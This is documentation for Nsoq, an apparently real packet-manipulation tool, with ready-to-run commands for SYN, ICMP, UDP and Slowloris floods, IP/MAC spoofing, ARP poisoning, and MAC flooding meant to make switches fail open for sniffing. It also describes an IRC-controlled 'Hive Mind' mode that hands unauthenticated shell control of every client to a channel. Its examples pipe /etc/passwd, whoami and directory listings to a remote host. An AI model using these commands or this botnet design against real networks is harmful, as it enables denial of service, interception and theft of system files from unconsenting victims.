Nsoq Project
(Network Security over a 'Q'rawler and RSOI Handler)

Nsoq Official Documentation

Felipe Ecker (Khun) <khun@hexcodes.org>

What is ?

Nsoq is a Network Security Tool for packet manipulation that allows a large number of options. Its primary purpose is to analyze and test several scenarios of TCP/IP environments, such as TCP/UDP packets and low levels ARP/RARP packets. Nsoq sends packets to any target type (hostnames, IPs and MAC address) handling many fields/headers like: Source/Destination IP address, Source/Destination MAC address, TCP flags, ICMP types, TCP/UDP/ICMP packet size, payloads ARP/RARP, etc.

Nsoq is able to operate in the RSOI mode (Remote System over IRC), where the tool can surrender all control of machine resources to some specific IRC channels ( also called Hive Mind option).

Nsoq executes systematically many types of network based attacks, like packet attacks, MAC/IP Spoofing, DoS/DDoS attacks, ARP Poison, MAC Flooding and Web Stress Testing.


What the purpose ??

More systems have some behavior forms on receiving certain packet types. In many situations, we avoid information that could be useful to a problem resolution or to check a network environment. So, the main idea of Nsoq is not intended to be an OS Fingerprint, Port Scanner, Packet Scanner, ARP Bombs or a pinger, but a network tool or a "clamp" for some adjustment or simulation.

Nsoq encourages the RSOI usage, where the objective is to have more flexibility to manage a remote system (over a trusted machine) or deal security issues.


But i already have the nmap, netcat, tcpdump, nessus, packit, hping..

There are good tools to perform penetration tests or analyze packets. However, we are always encouraged to develop and write codes. I say: It was extremely useful develop Nsoq in the opportunity to open other tools and join all this onto a single application.
Nsoq performs some functions like:

- Threads control
- RSOI mode (HIVE MIND - Mass Remote Control over IRC channels)
- Sends all TCP packet types
- Sends UDP packets
- Sends many ICMP packet types
- MAC/IP Spoofing
- Performs a MAC Flooding Attack
- Performs an ARP Poisoning Attack
- Performs a hard SYN/ACK flood
- Performs aggressive flood rate for all modes
- Arping mode
- Listen for TCP connections (any Port)
- Listen for UDP packets (any Port)
- Listen for ICMP packets (Listen for pings or others ICMP packets)
- Listen for ARP/RARP packets (Listen mode on link layer)
- WEB Stress Test using HTTP requests (DoS/DDoS attack)
- WEB Stress Test using TCP packets (DoS/DDoS attack)
- WEB Stress Test using UDP packets (DoS/DDoS attack)
- WEB Stress Test using ICMP packets (DoS/DDoS attack)
- WEB Stress Test using partials HTTP packets (DoS/DDoS SlowLoris attack)


Nsoq dark tags:
- Nsoq is a tool for (RSOI) Remote System over IRC
- Nsoq is an IRC tool for iPhone , Linux , BSD and MAC OSX
- Nsoq is a DoS Tool for iPhone , Linux , BSD and MAC OSX
- Nsoq is a DDoS Tool for iPhone , Linux , BSD and MAC OSX
- Nsoq is a Mac Flooding Tool (for Linux , MAC OSX , BSD and for iPhone)
- Nsoq is an Arp Poisoning Tool (for Linux , MAC OSX , BSD and for iPhone)
- Nsoq is an Arping Tool (for Linux , MAC OSX , BSD and for iPhone)
- Nsoq is a graphical netcat for iPhone (jailbreak).


And what is RSOI ??

RSOI is an acronym to: Remote System over IRC.





How?? Show me something


# nsoq -d hexcodes -Ie
Sends one ICMP packet (Echo Request) to host "hexcodes".

# nsoq -lI
ICMP listen mode. Listen for ICMP packets like PINGs.

# nsoq -It -d nsoq.org -c
Sends ICMP packets (Timestamp Request) on continuous mode to server "nsoq.org".

# nsoq -s 10.1.100.100 -d nsoq.org -u -p 4140
Sends one empty UDP packet with spoofed source ip "10.1.100.100" to host "hexcodes" on port 4140.

nsoq -d nsoq.org -u -p 9000 -P 22000 -F 900 -q 20
Sends only 20 UDP packets to the server "nsoq.org" on port 9000, from source port 22000 with flood Delay of 900 microseconds.

# nsoq -d 201.1.0.13 -Ie -x 512 -t 50 -z
Sets Nsoq for sending ICMP packets (Echo Request) with size of 512 bytes to host "201.1.0.13" with TTL 50. Doesn't wait by ICMP Echo ReplY.

# nsoq -It -d nsoq.org -c
Sends ICMP packets (Timestamp Request) on continuous mode to server "nsoq.org".

# nsoq -lU -P 59
Listen UDP packets on local port 59 (all addresses and loopback).

# nsoq -d hexcodes -Ts -p 6000
Sends a TCP SYN packet to host "hexcodes" on port 6000.

# nsoq -lC -P 12345 > file.txt
Listen for TCP connections on local port '12345', and write the received data to the file 'file.txt'.

# nsoq -d hexcodes -Tc -p 12345 < /etc/hosts
Connect to host 'hexcodes' reading the file '/etc/hosts. The file content will be send over the TCP connection on port '12345' (netcat style).

# nsoq -lT -P 2134 -D
Listen for TCP packets on local port "2134" and show the packet content.

# nsoq -H FF:FF:FF:FF:FF:FF
Sends an ARP REPLY packet to physical Broadcast FF:FF:FF:FF:FF:FF. (The source MAC address and the source IP address will be obtained locally by the active interface. The destination IP address will be NULL).

# nsoq -i eth2 -h 00:BB:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF -d 10.1.10.1 -A
Sends an ARP REQUEST packet by the eth2 interface with source MAC 00:BB:AA:CC:BB:AA, to destination physical Broadcast FF:FF:FF:FF:FF:FF, asking "Who ??" on the network have the IP address "10.1.10.1". The IP "10.1.10.1" (if alive) will respond with an ARP REPLY filled with its own MAC/IP address pair.

# nsoq -s 10.2.2.100 -h 00:CC:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF
Sends an ARP REPLY packet to destination physical Broadcast FF:FF:FF:FF:FF:FF saying that the source IP address "10.2.2.100" have now the MAC address 00:CC:AA:CC:BB:AA. (Caution: This option changes the ARP cache table. Possible ARP poisoning attack).

# nsoq -a 10.1.50.10
Sends one Arp'ing packet to Host "10.1.50.100". If the host/hardware is alive on network/LAN, by default an ARP REPLY will be returned. Otherwise, nothing happens. This option can be used to bypass ICMP filters (PING filters).

# nsoq -f 250000
Sends 250000 ARP REPLY packets (to physical broadcast) with the fields (SOURCE MAC, DESTINATION MAC, SOURCE IP and DESTINATION IP ADDRESSESS) randomly generated.

# nsoq -lA -D
Listen for ARP/RARP packets. Listen for all incoming ARP/RARP packets on link layer and show the packet content.

# nsoq -N irc.quakenet.org -L Cybers
Sets Nsoq to connect on IRC Server "irc.quakenet.org" on channel #Cybers. This option puts Nsoq on RSOI mode. So, the tool will be NO AVAILABLE to be controled by the user. Only the users on IRC server "irc.quakenet.org" channel #Cybers can do this.

# nsoq -d 10.0.0.1 -W -n 40
Sets the Nsoq to "WEB Stress Mode". This option puts Nsoq to send HTTP requests (GET method) on moderate flood to host "10.0.0.1" on port 80 (default) with 40 threads. This stress test attempts to exhaust the web service's resources and check the target's limit response.





Wow.. So Give me all options


# nsoq
[-cbzDvuRAUCWBSKY]
[-d destination] [-s source] [-p port] [-P source_port] [-q number_packets] [-F delay] [-n number_threads] [-x buffer_size] [-t ttl] [Ie] [IE] [Id] [Iq] [Im] [-M mask] [lI] [Tc] [Ts] [Ta] Tf] [Tr] [Tp] [Tx] [Tn] [-lT (-P port)] [-lC (-P port)] [-lU (-P port)] [-i interface] [-H destination_mac] [-h source_mac] [-a ip_address] [-f number_packets] [-r ip-ip] [-e ip_address] [lA] [-N irc_server] [-L irc_channel] [-G channel_password]

GLOBAL

-d (destination)
Destination host (hostname or IP address).

-s (source)
Source host (hostname or IP address). If -s (host) option is not specified, the Nsoq assumes the IP address found by the first interface defined on the system: (eth0, eth1, eth2, etc...) ordinarily.

-p (port)
Destination port (remote port).

-P (port)
Source port (local port).

-i (interface)
Sets the interface option (eg: -i eth0).

-q (number packets)
Number of packets to send.

-x (packet size)
Sets the packet size. The package size cannot be larger than 1470 bytes or larger than defined system MTU (e.g.: MTU=1500).

-t (ttl)
Sets the TTL field.

-c
Continuous mode. Sends packets without interruption with regular interval of 1 (one) second between the shoots.

-F (delay)
Flood option. Set the time (delay) between the shoots (in microseconds). The -F option cannot be used with -c or -b options.

-b
Aggressive flood. This option puts Nsoq optimized to send the largest number of packets in a short amount of time [CAUTION].

-z
Don't wait for replies. Ignore packet responses.

-n (threads)
Number of threads to use on sending option.

-D
Display the packet content on receiving packets (tcpdump style).

-v
Print the version.

--help
Print the initial help page with arguments.



ICMP OPTIONS

-Ie
Sends an ICMP packet Type 8 (Echo Request). The target will respond with an ICMP packet Type 0 (Echo Reply) if server is alive.

-IE
Sends an ICMP packet Type 0 (Echo Reply).

-Id
Sends an ICMP packet Type 15 (Information Request).

-It
Send ICMP packets Type 13 (Timestamp Request).

-Iq
Send ICMP packets Type 4 (Source Quench).

-Im
Send ICMP packets Type 17 (Mask Request). If the target is configured to reply a request mask, a MaskReply packet will be received with the Mask.

-M (mask)
Send ICMP packets Type 18 (Mask Reply). The "Mask" argument is the mask defined for packet. (Eg: -M 255.255.0.0).

-lI
ICMP Listen Mode. Listen for incoming ICMP packets. Any ICMP packet "unicast" will be captured.



TCP OPTIONS

-Tc
Simple TCP connection to target. The option -p port is required. This option uses connect() routine for synchronization.

-Ts
Sends a TCP SYN packet (TCP packet with the SYN bit on).

-Ta
Sends a TCP ACK packet (TCP packet with the ACK bit on).

-Tf
Sends a TCP FINAL packet (TCP packet with the FIN bit on).

-Tr
Sends a TCP RESET packet (TCP packet with the RST bit on).

-Tp
Sends a TCP PUSH packet (TCP packet with the PSH bit on).

-Tp
Sends a TCP packet XMAS (TCP packet with the FIN-PUSH-URG bits on).

-Tn
Sends a NULL TCP packet (TCP packet with the NONE bits on. All tcp flags off).

-lT (-P port)
TCP Listen Mode. Listen for incoming TCP packets. This option needs to use the "-P port" flag.

-lC (-P port)
Listen for TCP connections. This option needs to use the "-P port" flag. This listener uses the accept() function for synchronization.



UDP OPTIONS
-u
UDP mode.

-lU (-P port)
UDP Listen Mode. Listens for incoming UDP packets. This option is used with the "-P port" flag. The UDP mode doesn't use a stream connection.



ARP/RARP OPTIONS

-H (destination mac)
Destination MAC address. Option required for ARP packets. This option requires a destination IP address. If "-d (destination)" is not given, Nsoq will assume by default a NULL value on this field header. Form: -H AA:DD:CC:22:11:AA.

-h (source mac)
Source MAC address. This option requires the source IP address. If "-s (source)" is not given, Nsoq assumes by default the first IP address defined by the first interface found in the system (eth0, eth1, eth2, etc). Form: -h AA:DD:CC:22:11:AA.

-R
Defines the frame type like a RARP packet. All ARP/RARP packets sent by Nsoq on the link layer are ARP by default. If "-R" is typed, then Nsoq send RARP packets instead.

-A
Defines the frame type to REQUEST packet. The packets sent by Nsoq on the link layer are REPLY by default. If "-A" is defined, then Nsoq sets the ARP/RARP packets to "REQUEST" type instead.

-a (ip address)
Arping Mode. This option sends ARP REQUEST packets to a given IP address. The target receives the packet and returns an ARP REPLY packet. This option is very useful for hosts that filtering ICMP pings.

-f (number_packets)
Mac Flood (CAUTION !!). This option sends ARP REPLY packets with SOURCE MAC, DESTINATION MAC, SOURCE IP ADDRESS and DESTINATION IP ADDRESS (randomly generated) on Aggressive Food. If the "-i (interface)" is not given, Nsoq takes the first valid interface found in the System. Eg usage:

# nsoq -f 120000

This option does a flooding by sending 120000 packets with random IP addresses and random MAC addresses. This attack is also called MAC FLOODING. Note: USE THIS OPTION VERY CAREFULLY. THIS CAN OVERFLOW THE ROUTING TABLES OR CAUSE UNEXPECTED BEHAVIOR ON SWITCHES AND NEIGHBORING'S HOSTS ON THE NETWORK.

-r (ip_address-ip_address)
ARP Cannon (CAUTION !!). This option sets Nsoq to send ARP REPLY packets to all defined IP addresses in the range "IP - IP". These packets will have a destination MAC address defined to physical broadcast address (FF:FF:FF:FF:FF:FF) and source MAC address randomly generated.
The option range (IP-IP) needs to be in the format shown below. Eg:

# nsoq -r 10.1.1.1-10.1.1.240

The above option does a flooding to destination physical broadcast FF:FF:FF:FF:FF:FF, saying to network enlace that all IP addresses in the range "10.1.1.1 to 10.1.1.240" will have a source MAC addresses randomly generated. This attack is also called MASSIVE ARP POISONING. This action probably TAKE DOWN for moments all IP addresses defined in the range argument. NOTE: USE THIS OPTION VERY CAREFULLY.

-e (ip address)
This option excludes the "ip address" from option ARP CANNON (-r ip-ip) above defined. Eg:

# nsoq -r 10.1.1.1-10.1.1.240 -e 10.1.1.10

The above option will exclude the IP address "10.1.1.10" from ARP CANNON attack.

-lA
Listen for incoming ARP/RARP packets on link layer.



WEB STRESS OPTIONS
-U
UDP attack.
Sends UDP packets on flood mode to HTTP host (default: Port 80).

-C
TCP connections attack.
Do TCP connections to HTTP host (default: Port 80).

-W
WEB HTTP attacks.
Makes HTTP requests (GET) to HTTP host (default: Port 80).

-B
ICMP attacks.
Sends ICMP packets on flood mode to HTTP host. (Also called Death Ping).

-S
TCP SYN attack.
Sends TCP SYN packets on flood mode to HTTP host (default: Port 80). Also called SYN Flood attack.

-K
TCP ACK attack.
Sends TCP ACK packets on flood mode to HTTP host (default: Port 80).

-Y
SLOWLORIS HTTP attack.
Sends partials HTTP packets (Slowloris) to host (default: Port 80).

INFO: Use the option -p (port) to set other port than 80.



HIVE MIND OPTION
(RSOI - Remote System over IRC)

-N (IRC_server)
An IRC network to connect. This option is required to put Nsoq on RSOI mode.

-L (IRC_channel)
IRC channel for connection.

-G (password)
IRC channel's password (if exists). If this option is not given, then Nsoq will type the password's channel like "nsoqpass" by default.





More discussions..


Connection or packet sending to any Port or Destination

Nsoq can connect or send packets to any destination or port. You can use this option to diagnose a port (listening or not) or check if the host is responding as expected:


# nsoq -d 10.0.0.2 -p 1024 -Tc
Does a simple TCP connection to host 10.0.0.2 on port 1024.

# nsoq -d 10.0.0.2 -p 20080 -u
Sends an UDP packet to host 10.0.0.2 on port 20080.

# nsoq -d 10.0.0.2 -p 80 -Ts -c
Sends TCP SYN packets to host 10.0.0.2 on port 80. If the port is open, then a TCP [ACK] packet will be returned. Otherwise, usually a TCP [RST] packet is returned.



Listen on any port (TCP and UDP) or listen for ICMP/ARP/RARP packets

Nsoq listen on any port (UDP and TCP) or listen for ICMP or ARP/RARP packets. This option is used to simulate a listen port supposedly given by a software, and verify the connection requests or data incoming. The Nsoq also does a listen for incoming ICMP data like: pings, replies, source quench, etc. Nsoq does a listen on the link layer level, capturing ARP/RARP packets (Requests and Replies).


# nsoq -lC -P 20
Sets nsoq to listen connections on local port 20 (TCP).

# nsoq -lU -P 1030
Sets nsoq to listen on local port 1030 (UDP).

# nsoq -lT -P 16 -s 10.0.0.1
Sets nsoq to listen on local port 16 (for TCP packets) only bound on address "10.0.0.1".

# nsoq -lI -D
Sets nsoq to listen ICMP data and show the packet content. All incoming ICMP packets will be captured. This option is useful to display incoming pings.

# nsoq -lA
Sets nsoq to listen data on the link layer. This will capture incoming ARP and RARP packets. This is useful to display ARP/RARP REQUESTS or REPLIES packets they cross the local network (enlace layer).



Running like an FTP Connection

Nsoq run like an FTP connection (over a TCP connection). It can listen at a given port reading/writing data on a specific connection (like Netcat style). The transferred data types are BINARY or TEXT. This mode is also compatible with Netcat modes (listeners and senders).


# nsoq -lC -P 2200 > hosts.txt
(Server Side) Listen on local port 2200 (TCP) and write the received data to file 'hosts.txt'.
# cat /etc/hosts | nsoq -d hexcodes -Tc -p 2200
(Client Side) Does a connection to host 'hexcodes' on port 2200 (TCP) reading the file '/etc/hosts' and transferring to remote host. The remote host 'hexcodes' will write the transferred data content to the 'hosts.txt' file.

# nsoq -lC -P 900 < files.zip
(Server Side) Listen on local port 900 (TCP), reading the 'files.zip' data to transfer on the next accepted connection.

# nsoq -d hexcodes -Tc -p 900 > new.zip
(Client Side) Sets the Nsoq to connect to the host 'hexcodes' on remote port 900 (TCP), reading the binary incoming data and writing into the local 'new.zip' file.



Arping - Alternative Ping

Nsoq sends ARP REQUEST packets to destinations in order to diagnose whether they are alive on the network. By default, the host that receives an ARP REQUEST packet must return an ARP REPLY informing your MAC/IP pair. This option is very useful for diagnosing whether a host is alive on the local network. If the host doesn't accept ICMP pings, so the arping mode can be used to bypass a firewall that is filtering ICMP packets.

# nsoq -a 10.0.0.100
Sends an ARP'ING to host "10.0.0.100". If the host is alive on a local network, then it will respond with an ARP REPLY packet.



DOS/DDoS based attacks (over Web Stress)

Since 1.7 version, the nsoq/mptcp has enabled a stress test of network based attacks. These attacks attempt to exhaust the Web Service resources and verify the target's limit. If many Nsoq clients run these routines at the same time targeted to a single server, then this server may fail in their services or become unavailable while attack lasts (Dos/DDoS):


# nsoq -d nsoq.org -W -n 20
Sets the nsoq to "Stress Test". The tool will send many HTTP requests (aggressive flood) to server "nsoq.org" on port 80 (default), and with 20 threads. This option tries to cause a great overhead on target system trying to exhaust the service WEB based. Threads can intensify the attack. The number of threads above ~20 on -W option (with a large link) can execute a complete denial of services (DoS).



Mac/IP Spoofing

Nsoq sends packets with spoofed Source IP address and spoofed Source MAC address. Nsoq can generates ICMP, TCP (syn, ack, rst, fin, push, null bits and xmas bits on), UDP packets and ARP/RARP (Request and replies) with this address filled with any value:


# nsoq -d 10.0.0.10 -p 890 -Ts -s 10.1.10.10
Sends a TCP packet (bit syn on) to address "10.0.0.10" on port 890 and with source IP address defined (spoofed) to "10.1.10.10".

# nsoq -s 0.0.0.0 -d 10.0.0.10 -p 9000 -u -c
Sends UDP packets to address "10.0.0.10" on port 9000 and with source IP address defined to NULL "0.0.0.0".

# nsoq -d 10.0.0.1 -Ie -z -F 1000 -s 10.255.0.255
Sends ICMP packets (Echo Request - PING) to address "10.0.0.10" with source IP address defined to "10.255.0.255". It doesn't wait by the Echo Reply (-z option) and does a flooding with a delay time of 1000 microseconds (-F option).

# nsoq -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00
Sends an ARP REPLY packet to physical BROADCAST (FF:FF:FF:FF:FF:FF) saying that its own IP address has now MAC address 00:00:00:00:00:00. On this option, the sender (you) will stop receive or send packets because will be isolated for a few seconds (out of communication).



Massive Flood

Nsoq sends any options (ICMP, TCP, UDP, and ARP-RARP) with "Flood Delay" or "Aggressive Flood" modes. The Flood Delay option sets the interval of shoots in microseconds, and send packets in a very low range time. The "Aggressive Flood" is harder because it ignores the packet reply and its optimization has focused to sending a large number of packets per second. In certain environments, these options can realize a DoS or stop the host's communication. Use these options CAREFULLY. Many aggressive floods can cause a complete unavailability of the target.


# nsoq -d nsoq.org -Ie -b
Sends ICMP packet type Echo Request (PING) to server "nsoq.org" with aggressive flood.

# nsoq -d 10.0.0.10 -p 900 -u -b -x 1300
Sends UDP packets (aggressive flood) to host "10.0.0.10" on port 900 with packet size of 1300 bytes.

# nsoq -d 10.0.0.10 -Iq -F 10
Sends ICMP packets (Source Quench type) to host "10.0.0.10" and with flood delay defined to 10 microseconds. This packet type can decrease the receiver's flow.

# nsoq -d 10.0.0.10 -s 10.0.0.0 -p 80 -Ts -F 1 -z
Sends TCP SYN packets to host on port 80, with source IP address defined to "10.0.0.0" and with a flood delay defined to 1 microsecond. This option doesn't wait for replies. This attack is also named "Spoofed Syn Flood".



ARP Poisoning

Nsoq sends packets at the link layer and can change the source/destination MAC addresses. Nsoq manipulate the source MAC address and the source IP address changing the ARP cache table of neighbors on the network. The characterization of this kind of action is known as MITM (Man In The Midle), cause you can change the ARP table of your neighbors making them believe that gateway is trusted, where the gateway was poisoned.


# nsoq -H FF:FF:FF:FF:FF:FF -s 10.0.0.1 -h AA:BB:CC:DD:EE:FF
Sends an ARP REPLY packet to physical BROADCAST saying that the source IP address "10.0.0.1" has now MAC address AA:BB:CC:DD:EE:FF. If the address "10.0.0.1" is alive on the network, then it will be unavaiable for minutes (offline for physical comunication).

# nsoq -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00 -s 10.0.0.1 -i eth0 -c
Sends successively ARP REPLY packets to physical BROADCAST by the eth0 interface, and saying that source host "10.0.0.1" has now the MAC address 00:00:00:00:00:00. This option puts the host "10.0.0.1" offline while the shoots are going.



MAC Flooding: Buffer overflow on the Switch's ARP Table (CAM TABLE)

Nsoq brings one specific option: ARP Flood (MAC FLOODING). This option is controversial, but is used for multiple purposes. The Nsoq option "-f" sends (num packets) to physical BROADCAST with Source and Destination MAC addresses randomly generated, and with Source and Destination IP addresses randomly generated too. The intent of this type of transmission is overloading the temporary ARP cache table of switches. Doing this shooting in a massive mode, you can exhaust the memory buffer storage table of the switches, which it will enter in "Fail Open" mode. On this stage, the switch will send all packets to all ports on the device (HUB mode), facilitating a process of sniffer NO-UNICAST of any host on the network.


# nsoq -f 240000
Sets nsoq to send 240000 ARP REPLY packets to physical BROADCAST with source and destination MAC address, source and destination IP address generated randomly. If the switch's memory buffer (CAM Table) is less than 240000, then the switch will enter on the "Fail Open" mode.





Hive Mind (RSOI)
Remote System over IRC

Mass Remote Control

Since 1.7 version, Nsoq has enabled the RSOI (Hive Mind) option for external use. This control is totally managed by an IRC channel, where a central controller (through commands given on the arbitrary channel of an IRC server) can remotely control all the clients (Nsoq) logged on the channel. This option cannot be used outside an IRC network, because Nsoq was developed waiting a communication over an IRC protocol.

Inside this option, the user no more has control over the tool, giving all you control to the IRC channel. In other words, using RSOI mode you give total control of Nsoq and the local MACHINE to all on the IRC channel, who can manipulate and use the local resources without any authentication.

However, it is useful for:

(*) Check the limit link of a remote host, where a controller may join many users at a channel, and then with a single shoot to make all the NSOQs clients at the same time responding to this command, triggering packets to a specific target and checking the loading limitations.

(*) FTP mode, using the IRC channel to manage specific file transfers over trusted machines.

Examples:
# nsoq -N irc.quakenet.org
(If no channel is given, the default #nsoq channel is used)
(If no password is given, the default 'nsoqpass' channel's password is used)


This option sets Nsoq to enter on IRC Server "irc.quakenet.com" (#nsoq channel by default). If Nsoq has logged without errors, the client will NOT accept any command from the user, cause Nsoq only will respond to commands that arrive from IRC server (#nsoq channel). If many Nsoq clients are logged in, all clients will be controlled by anyone that have write access to channels. Therefore, all the clients will execute the commands typed in the channel.

# nsoq -N irc.quakenet.org -L Cybers
#Cybers channel defined in Nsoq connection.

# nsoq -N irc.quakenet.org -L Cybers -G pass
Channels's password 'pass' defined in Nsoq connection.


Inside the IRC #channel:

After connected, the channel can send any commands to ALL Nsoq clients. These commands have a specific syntax to differentiate it from normal text typed on the channel. Nsoq just understands commands prefixed by syntax:

@!~<space>

I.e., everything that comes after this syntax says to all Nsoq clients to use these words like a real execution command:


@!~ nsoq -d nsoq.org -Ie
That says to ALL Nsoq clients connected to the channel to send an ICMP Echo Request (Ping) to "nsoq.org" server.

@!~ cat /etc/hosts
This sounds like a blind query.
This command (sent by the #channel) tells to all Nsoq clients to run the '/bin/cat' command on /etc/passwd file.
The result WILL BE NOT SHOWED on IRC channel.

@!~ cat /etc/passwd | nsoq -d nsoq.org -Tc -p 123
SO MUCH MORE DANGEROUS:
This command (sent by the #channel) tells to all Nsoq clients to run a /bin/cat command on '/etc/passwd' file and send result to remote host 'hexcodes'. If the 'nsoq.org' server is listening on port 123 with Nsoq or Netcat (ie), the content of remote '/etc/passwd' file will be transferred.

Conclusion:
So we don't need spawn a shell, cause we already have one dedicated shell under RSOI mode across the IRC channel. Such this:

@!~ ls -al /etc | nsoq -d nsoq.org -Tc -p 123
@!~ whoami | nsoq -d nsoq.org -Tc -p 123
@!~ uname -a | nsoq -d nsoq.org -Tc -p 123
@!~ grep root /etc/passwd | nsoq -d nsoq.org -Tc -p 123




Security

Nsoq needs superuser privileges (root) for execution. DO NOT use the bit SUID to allow root privileges. This is not recommended and may allow involuntary or aggressive DoS/DDoS attacks. The privileged use of Nsoq also allows users to manipulate the ARP cache table of neighbors on network, or put all the system over a remote control.




Downloads

Nsoq is licensed under GPL and Free Software Foundation.
A copy of the license accompanies the software (Licensed under GPL 3 - (C) Copyright).

Supported systems: Linux (all boxes), FreeBSD, MAC OSX and Apple IOS* (w/ jailbreak).
The Nsoq can be freely downloaded here:

nsoq-1.9.5.tar.gz - Latest version. Source code for Linux, *BSD, MAC OSX, Apple IOS*).
nsoq-1.9.5-i386.rpm - RPM package (i386). For RedHat, Centos and Fedora.
nsoq-1.9.5-x86_64.rpm - RPM package (x86_64). For RedHat, Centos and Fedora.
nsoq-1.9.5-i386.deb - DEB package (i386). For Debian, Ubuntu or any Debian based systems.
nsoq-1.9.5-x86_64.deb - DEB package (x86_64). For Debian, Ubuntu, etc.
mptcp-2.0.2-IOS.deb - Nsoq/Mptcp DEB package for IOS* (iDevices with jailbreak).
Nsoq on GitHub - Nsoq development tree on GitHub.




Felipe Ecker (Khun) <khun@hexcodes.org>
54.81.225.157